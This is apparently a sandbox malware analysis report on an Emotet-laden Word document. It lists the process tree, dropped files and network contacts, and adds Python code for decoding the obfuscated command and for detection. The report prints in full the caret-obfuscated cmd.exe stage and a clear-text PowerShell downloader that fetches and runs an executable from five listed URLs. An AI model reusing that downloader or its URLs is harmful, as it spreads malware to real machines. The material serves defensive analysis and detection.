File name: | b41e885b8eafe1b77caf3fb2184abb636002dd49135ddd3d96f331558211805f.doc |
Full analysis: | https://app.any.run/tasks/1a5284c1-1742-49fd-a26f-70703bdbc2be |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most widespread and damaging trojans of recent years. Over its lifetime it was repeatedly upgraded, from a banking trojan into a modular loader that delivers further malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | November 14, 2018, 10:28:06 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | - |
Indicators: | - |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Jocelyn, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 06:29:00 2018, Last Saved Time/Date: Wed Nov 14 06:29:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | EA0FA7E60123C8D84A4DADED110D52A1 |
SHA1: | 2771F2121C4AC618F6AC6E32F9FA551E7CEFD3E1 |
SHA256: | B41E885B8EAFE1B77CAF3FB2184ABB636002DD49135DDD3D96F331558211805F |
SSDEEP: | 1536:vJK+lhLocn1kp59gxBK85fBt+a9Vjduedt9+d5paxyN9:vJbla41k/W48/jduedt9+d5paxyP |
Extension | Identified type (score) |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Title: | - |
Subject: | - |
Author: | Jocelyn |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:11:14 06:29:00 |
ModifyDate: | 2018:11:14 06:29:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 13 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 14 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | - |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3636 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\b41e885b8eafe1b77caf3fb2184abb636002dd49135ddd3d96f331558211805f.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1728 | cmd /V^:^O/C"^se^t M^y=)^Z^W^$YNG^uz^i^E^sJ^SB^p^Oc^4e^x^}@^\at^[/^o^w^Q^L^IP]^jF(^g^l5r^ynq^T^k^0m^-'^2b.U^:^,^1^f^d^ ^{^h;v=^M^+&&^f^or %^2 ^in (15,^2^8,^29,^19^,4^1,^1^1,6^2,^19,^39^,^3^9^,60,^3^,7^,^11^,6^2,^65^,^50^,8,^9^,1,50,63^,3,4^,31,^8^,^6^5^,^50^,^6^2,^25,2^5,^15^,^55,^2^7^,^2^7,^59,^7^,62^,^2^8,1^7,3^8,25^,1^7,^5^3,1^7^,^2^8^,^4^8,27^,3^9,4^4,25^,^15,2^2,62,^2^5,2^5^,15,^55^,27^,27,^52,19^,1^1^,^2^5^,25,4^1^,^2^4^,^64^,19,^39,11,^53^,3^9^,^9^,^64,19,^2^7^,4^0,^1^5^,5^4^,^2^2^,6^2,2^5^,^25,^15^,55,^27,^2^7,^1^1,^24^,^9^,^1^1^,^9^,59^,5^9^,62,53,1^7^,2^8^,4^8^,^2^7,4,2^8^,^2,1^,^59,^18,^2^2,^6^2,^25,^2^5^,15,^55,^27^,2^7,9,4^3,^11,7,4^8,1^9,^2^0^,53,17,2^8,^4^8,^53^,^4^8^,^20^,2^7,8^,4^5^,66^,5^9^,^5^1^,22,^62,^2^5,2^5^,^1^5,^5^5,^2^7,^27^,3^8^,9,^24^,4^3,^38,4^3^,38^,^7^,42^,^1^9^,^4^3^,^41,19^,^2^4,^39^,53^,^1^7,28^,4^8,2^7,^45^,50,^53,1^3,1^5^,3^9^,^9,^25,^3^7,^50^,22,50^,0,^6^3^,^3^,^3^5^,^48^,^64^,65,^37,^26,13^,4^2,1^1,2^5^,1^9,^4^8,^5^3^,^3^2^,^1^6^,^5^3^,33^,24^,2^5,^6^2^,^34^,55,^55,6,1^9^,2^5,^4^5,^1^9^,^4^8,^1^5^,^33^,2^4,25,^6^2^,^37^,0^,^67,5^0,2^3^,^12,^30,9,5^3^,^19^,2^0,^1^9,50,^0^,^6^3^,3,36,46,^30,^6^0,^65^,^5^,^1^9,^29,^4^9,^1^6,^52,3^5^,^1^9,^17^,^2^5,60^,4^9^,^1^7^,^2^8^,^48,60,50^,^4^8^,^1^1,^20^,4^8^,^39,51,5^3,20,48^,^3^9^,6^2,25,25^,^1^5,^50,^6^3^,^3^,^1,^4^6^,4^8,60^,^6^5^,^6^0,^5^,^1^9^,29,4^9,16,^5^2,^35,19^,1^7^,^25,^60^,49^,^1^7^,^28^,^4^8^,6^0,^5^0^,^2^4^,5^9^,^2^8,^5^9,5^2^,5^3^,11^,25,^4^1,^19,^2^4,4^8^,^50,63,^58^,^2^8^,^4^1,19^,^2^4^,^1^7,^6^2^,^37,3,3^5^,^2^8^,44^,60,9,^4^3,60^,^3,^4,31,^8,0,61^,25,^41^,^4^2^,^61,3^,^3^6,^4^6,30^,^5^3^,^2^8,15,^19,4^3^,^3^7,50,^6,^1^0,45^,50^,^5^6,^3^,3^5,28,^4^4^,^5^6,^4^7,0,6^3^,^3,3^6,46,3^0^,53,11^,19,43,59^,^3^7,0,6^3^,^3^,1^,^46,^48^,^53,28^,1^5^,19^,^43,^3^7,0^,6^3,^3,1,46^,^4^8,^5^3,^25^,42,^1^5^,^1^9,^60^,65,^6^0^,^57^,6^3^,^3^,^1^,46^,48^,53,29^,4^1^,^9^,25^,19,37^,^3,^3^6^,4^6^,3^0,^53^,^4^1,19^,1^1,1^5^,^28,4^3,11^,^1^9,14,^2^8,59^,^42,0,63,^3,1,4^6,4^8^,^5^3^,1^1,24^
,6^4,19^,25^,^28^,^58,9,^3^9,^1^9^,3^7^,3,35,^4^8^,64,0,^63,^1^3,^25^,2^4^,4^1,25,49^,^33^,4^1,^2^8^,1^7^,1^9^,11^,1^1,60,^3^,^3^5^,^4^8^,6^4^,^6^3^,52,41,1^9,2^4,46^,^2^1,^17,2^4,^2^5^,^1^7,^6^2,^6^1^,2^1,21,60^,^60^,^60^,6^0,60^,60^,6^0^,60,60,^60^,60^,6^0^,6^0,60,^60,6^0^,^60,69)^do ^s^et ^B^1=!^B^1!!M^y:~%^2,1!&&^if %^2=^=^69 c^a^l^l %^B^1:*^B1!^=%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3880 | powershell $ush='ziZ';$YLz='http://duhocgtc.com/lqtp@http://besttravels.live/5pU@http://saisiddh.com/YoWZd4@http://insumex.com.mx/zTMd2@http://giangnguyenreal.com/T'.Split('@');$jmv=([System.IO.Path]::GetTempPath()+'\JQi.exe');$FkQ =New-Object -com 'msxml2.xmlhttp';$Zkm = New-Object -com 'adodb.stream';foreach($joq in $YLz){try{$FkQ.open('GET',$joq,0);$FkQ.send();$Zkm.open();$Zkm.type = 1;$Zkm.write($FkQ.responseBody);$Zkm.savetofile($jmv);Start-Process $jmv;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2064 | "C:\Users\admin\AppData\Local\Temp\JQi.exe" | C:\Users\admin\AppData\Local\Temp\JQi.exe | — | powershell.exe |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
3496 | "C:\Users\admin\AppData\Local\Temp\JQi.exe" | C:\Users\admin\AppData\Local\Temp\JQi.exe | — | JQi.exe |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
1712 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | JQi.exe |
User: admin Company: Micro Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.1 | ||||
2524 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | lpiograd.exe |
User: admin Company: Micro Integrity Level: MEDIUM Version: 6.1.7600.1 |
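The cmd.exe stage (PID 1728) never contains the PowerShell command in clear text. It stores a 68-character alphabet in the variable `My`, then a `for` loop over a list of indices appends one character per iteration with cmd's delayed-expansion substring syntax `!My:~index,1!`; the carets (`^`) are cmd escape characters that disappear when the line is parsed, and the trailing index 69 lies past the end of the alphabet, so it expands to nothing and only serves as the loop sentinel that triggers the final `call`, which runs the assembled string (PID 3880). The Python below is an added example for decoding that pattern offline; it is not part of the ANY.RUN report. The sample command line is constructed from the report's own alphabet and its first 22 indices (the full list is several hundred entries), with the sentinel 69 appended and a caret followed by a line break inserted where the listing above wraps, so the decoder also demonstrates cmd's caret-newline continuation.

```python
import re

# Constructed sample: the report's alphabet and the first 22 indices of the
# PID 1728 command line, the sentinel 69 appended, and a caret + line break
# placed inside the index list the way the process listing wraps.
SAMPLE_CMDLINE = r'''cmd /V^:^O/C"^se^t M^y=)^Z^W^$YNG^uz^i^E^sJ^SB^p^Oc^4e^x^}@^\at^[/^o^w^Q^L^IP]^jF(^g^l5r^ynq^T^k^0m^-'^2b.U^:^,^1^f^d^ ^{^h;v=^M^+&&^f^or %^2 ^in (15,^2^8,^29,^19^,4^1,^1^1,6^2,^19,^39^,^3^9^,60,^3^,7^,^11^,6^2,^65^,^50^,8,^9^,1,50,63^
,69)^do ^s^et ^B^1=!^B^1!!M^y:~%^2,1!&&^if %^2=^=^69 c^a^l^l %^B^1:*^B1!^=%"'''


def unescape_carets(text: str) -> str:
    """Undo cmd.exe caret escaping.

    A caret directly before a line break is cmd's line continuation, so both
    the caret and the break are dropped. Elsewhere ``^x`` yields the literal
    ``x`` (hence ``^^`` yields a single ``^``).
    """
    text = re.sub(r"\^\r?\n", "", text)
    return re.sub(r"\^(.)", r"\1", text, flags=re.DOTALL)


def cmd_substring(value: str, start: int, length: int) -> str:
    """Mimic ``!VAR:~start,length!``: a negative start counts back from the
    end, and a start at or past the end yields "" (the sentinel index 69)."""
    if start < 0:
        start = max(len(value) + start, 0)
    if start >= len(value):
        return ""
    return value[start:start + length]


def decode_index_obfuscation(cmdline: str) -> dict:
    """Rebuild the string assembled by the set/for/substring pattern.

    Returns the alphabet, the index list and the decoded command so that the
    caller can inspect each stage rather than trusting a single string.
    """
    plain = unescape_carets(cmdline)
    m_set = re.search(r"\bset\s+(\w+)=(.*?)&&", plain)           # set My=<alphabet>&&
    m_for = re.search(r"\bfor\s+%(\w+)\s+in\s*\(([^)]*)\)\s*do\s+set\s+(\w+)=", plain)
    m_sub = re.search(r"!(\w+):~%(\w+),(\d+)!", plain)            # !My:~%2,1!
    if not (m_set and m_for and m_sub):
        raise ValueError("command line does not use the set/for/substring pattern")
    if m_sub.group(1) != m_set.group(1) or m_sub.group(2) != m_for.group(1):
        raise ValueError("substring expansion does not read the alphabet with the loop variable")
    alphabet = m_set.group(2)
    length = int(m_sub.group(3))
    indices = [int(i) for i in m_for.group(2).split(",") if i.strip()]
    decoded = "".join(cmd_substring(alphabet, i, length) for i in indices)
    return {"alphabet": alphabet, "indices": indices, "decoded": decoded}


if __name__ == "__main__":
    result = decode_index_obfuscation(SAMPLE_CMDLINE)
    print(f"alphabet ({len(result['alphabet'])} chars): {result['alphabet']!r}")
    print("decoded:", result["decoded"])
```

Run against the full command line from the listing above (joined across the wrap), the same function yields the PowerShell downloader shown for PID 3880; on the truncated sample it yields its opening `powershell $ush='ziZ';`. Note that `%2` is the loop variable only because the line is typed into `cmd /C`; inside a batch file the same construct would read `%%2`.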
PID | Process | Filename | Type | |
---|---|---|---|---|
3636 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3033.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZUBHI2597HYVD0HQAFGQ.temp | — | |
MD5:— | SHA256:— | |||
3636 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1556C5F0148ADC12C233F60BEA416A8F | SHA256:DD1E17D0FEB54E5AD3CBDBD765C12F8E1B02DC979FB7748C6160EF5F0EEBE1F5 | |||
3636 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$1e885b8eafe1b77caf3fb2184abb636002dd49135ddd3d96f331558211805f.doc | pgc | |
MD5:0D3388A7F55C7F69D2270E1EF1B8C1A9 | SHA256:245CAD038B5C6FFA9DD2F6AE9254D5629AC215C27F6570EED3ED78C6033B397C | |||
3880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E | |||
3496 | JQi.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:A03F30CC8D3DF70C4BD8BC7EF100806A | SHA256:B2C5E2CE8D94D854F39B418AFDBB373E1CF9E40D273046255350366E177156B9 | |||
3880 | powershell.exe | C:\Users\admin\AppData\Local\Temp\JQi.exe | executable | |
MD5:A03F30CC8D3DF70C4BD8BC7EF100806A | SHA256:B2C5E2CE8D94D854F39B418AFDBB373E1CF9E40D273046255350366E177156B9 | |||
3880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF183b3f.TMP | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E | |||
3636 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex | text | |
MD5:F3B25701FE362EC84616A93A45CE9998 | SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3880 | powershell.exe | GET | 200 | 103.81.85.177:80 | http://duhocgtc.com/lqtp/ | VN | executable | 448 Kb | malicious |
— | — | GET | 200 | 83.110.100.209:443 | http://83.110.100.209:443/ | AE | binary | 148 b | malicious |
3880 | powershell.exe | GET | 301 | 103.81.85.177:80 | http://duhocgtc.com/lqtp | VN | html | 672 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3880 | powershell.exe | 103.81.85.177:80 | duhocgtc.com | The Corporation for Financing & Promoting Technology | VN | suspicious |
2524 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
Domain | IP | Reputation |
---|---|---|
duhocgtc.com | 103.81.85.177 | malicious |
PID | Process | Class | Message |
---|---|---|---|
3880 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3880 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3880 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2524 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
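The process tree above is the part of this report that transfers best to detection: WINWORD.EXE spawning cmd.exe, a cmd.exe line built almost entirely of caret escapes with `/V:O` plus `!var:~` substring expansion, a powershell.exe line that downloads through the `msxml2.xmlhttp` and `adodb.stream` COM objects, a PE executed from `%TEMP%`, and that PE dropping a renamed copy under `AppData\Local\Microsoft\Windows`. The Python below is an added example, not part of the ANY.RUN report, that runs those checks over process-creation events modelled on the tree (PIDs and image paths as listed, the cmd.exe command line truncated). The rule names, the caret-count threshold and the Office/script-host lists, which generalize beyond the WINWORD-to-cmd pair seen here, are my assumptions.

```python
import re
from dataclasses import dataclass

# Assumed generalizations of what the tree shows (only WINWORD, cmd and powershell appear here).
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
COM_DOWNLOADER = re.compile(r"msxml2\.xmlhttp|adodb\.stream", re.I)
URL = re.compile(r"https?://[^\s'\"@;)]+", re.I)   # '@' excluded: the report's URLs are '@'-joined
CARET_THRESHOLD = 10                                # assumed; legitimate lines rarely need any


@dataclass
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


# Constructed events modelled on the report's process tree; not a sandbox export.
EVENTS = [
    ProcEvent(3636, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\b41e885b8eafe1b77caf3fb2184abb636002dd49135ddd3d96f331558211805f.doc"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(1728, r"C:\Windows\system32\cmd.exe",
              r'''cmd /V^:^O/C"^se^t M^y=)^Z^W^$YNG^uz^i^E^sJ^SB^p^Oc^4e^x^}@^\at^[/^o^w^Q^L^IP]^jF(^g^l5r^ynq^T^k^0m^-'^2b.U^:^,^1^f^d^ ^{^h;v=^M^+&&^f^or %^2 ^in (15,^2^8,^29)^do ^s^et ^B^1=!^B^1!!M^y:~%^2,1!&&^if %^2=^=^69 c^a^l^l %^B^1:*^B1!^=%"''',
              r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"),
    ProcEvent(3880, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell $ush='ziZ';$YLz='http://duhocgtc.com/lqtp@http://besttravels.live/5pU@http://saisiddh.com/YoWZd4@http://insumex.com.mx/zTMd2@http://giangnguyenreal.com/T'.Split('@');$jmv=([System.IO.Path]::GetTempPath()+'\JQi.exe');$FkQ =New-Object -com 'msxml2.xmlhttp';$Zkm = New-Object -com 'adodb.stream';foreach($joq in $YLz){try{$FkQ.open('GET',$joq,0);$FkQ.send();$Zkm.open();$Zkm.type = 1;$Zkm.write($FkQ.responseBody);$Zkm.savetofile($jmv);Start-Process $jmv;break}catch{}}",
              r"C:\Windows\system32\cmd.exe"),
    ProcEvent(2064, r"C:\Users\admin\AppData\Local\Temp\JQi.exe",
              r'"C:\Users\admin\AppData\Local\Temp\JQi.exe"',
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(1712, r"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe",
              r'"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"',
              r"C:\Users\admin\AppData\Local\Temp\JQi.exe"),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def unescape_carets(text: str) -> str:
    """Strip cmd's caret escapes so keyword checks see what cmd.exe sees."""
    return re.sub(r"\^(.)", r"\1", text, flags=re.DOTALL)


def evaluate(ev: ProcEvent) -> dict:
    """Return the rule names that fire for one event plus any URLs in its command line."""
    rules, img, parent = [], basename(ev.image), basename(ev.parent_image)
    if parent in OFFICE and img in SCRIPT_HOSTS:
        rules.append("office_spawns_script_host")
    if img == "cmd.exe":
        plain = unescape_carets(ev.cmdline)
        if ev.cmdline.count("^") >= CARET_THRESHOLD:
            rules.append("cmd_excessive_carets")
        # /V:O(N) enables delayed expansion; !var:~n,1! builds a string one char at a time.
        if re.search(r"/V:?O", plain, re.I) and re.search(r"!\w+:~", plain):
            rules.append("cmd_delayed_expansion_substring_build")
    if img == "powershell.exe" and COM_DOWNLOADER.search(ev.cmdline):
        rules.append("powershell_com_object_downloader")
    in_temp = re.compile(r"\\appdata\\local\\temp\\", re.I)
    if in_temp.search(ev.image) and parent in SCRIPT_HOSTS:
        rules.append("script_host_runs_pe_from_temp")
    if re.search(r"\\appdata\\local\\microsoft\\windows\\", ev.image, re.I) and in_temp.search(ev.parent_image):
        rules.append("temp_pe_drops_copy_into_appdata")
    return {"rules": rules, "urls": URL.findall(ev.cmdline) if rules else []}


def scan(events) -> dict:
    """Map PID -> findings for every event that triggered at least one rule."""
    return {ev.pid: r for ev in events if (r := evaluate(ev))["rules"]}


if __name__ == "__main__":
    for pid, finding in scan(EVENTS).items():
        print(pid, finding["rules"], finding["urls"])
```

WINWORD.EXE itself (PID 3636) triggers nothing, which is the point: the alerts attach to the chain below it, and the URL extraction turns the powershell.exe event into the same five download locations the report lists without having to run the script.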